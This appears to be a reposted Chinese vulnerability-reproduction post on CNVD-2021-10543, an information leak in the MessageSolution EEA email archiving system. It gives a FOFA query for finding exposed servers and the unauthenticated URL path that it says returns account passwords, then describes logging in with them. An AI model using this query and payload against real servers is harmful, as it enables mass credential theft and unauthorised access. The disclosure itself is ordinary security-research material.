【CNVD-2021-10543】MessageSolution 邮件归档系统EEA 漏洞复现

【CNVD-2021-10543】MessageSolution 邮件归档系统EEA 漏洞复现
2021-04-02 11:01:33 Author: mp.weixin.qq.com(查看原文) 阅读量:115 收藏

文章来源：渗透Xiao白帽

0x01 前言

MessageSolution是企业电子邮件归档软件的开发商。MessageSolution企业邮件归档管理系统EEA存在信息泄露漏洞。攻击者可利用漏洞获取Windows服务器administrator hash与web账号密码等敏感信息。

0x02 漏洞影响

MessageSolution 企业邮件归档管理系统EEA

0x03 漏洞复现

FOFA语句

title="MessageSolution Enterprise Email Archiving (EEA)"

PAYLOAD:

http://ip/authenticationserverservlet/

直接访问如下，会看到泄露的账号密码

利用泄露的账号密码登录系统

验证脚本

0x04 参考链接

https://mp.weixin.qq.com/s/_ieRHX-7nnnWMeflFcNEnQ

微信公众号文章素材之分割线大全

推荐文章++++

*CVE-2021-3156：Linux sudo权限提升漏洞复现

*微软NetLogon特权提升漏洞复现（CVE-2020-1472）

*Linux sudo权限提升漏洞复现（CVE-2021-3156）

文章来源: http://mp.weixin.qq.com/s?__biz=MzAxMjE3ODU3MQ==&mid=2650507359&idx=3&sn=678ba3a31dbea515c1b1ceb6d2a11bb0&chksm=83baedbbb4cd64adeb51999b559d8f397b2688bbd4317565f6dea4933b74665f28b3d10b2701#rd
如有侵权请联系:admin#unsafe.sh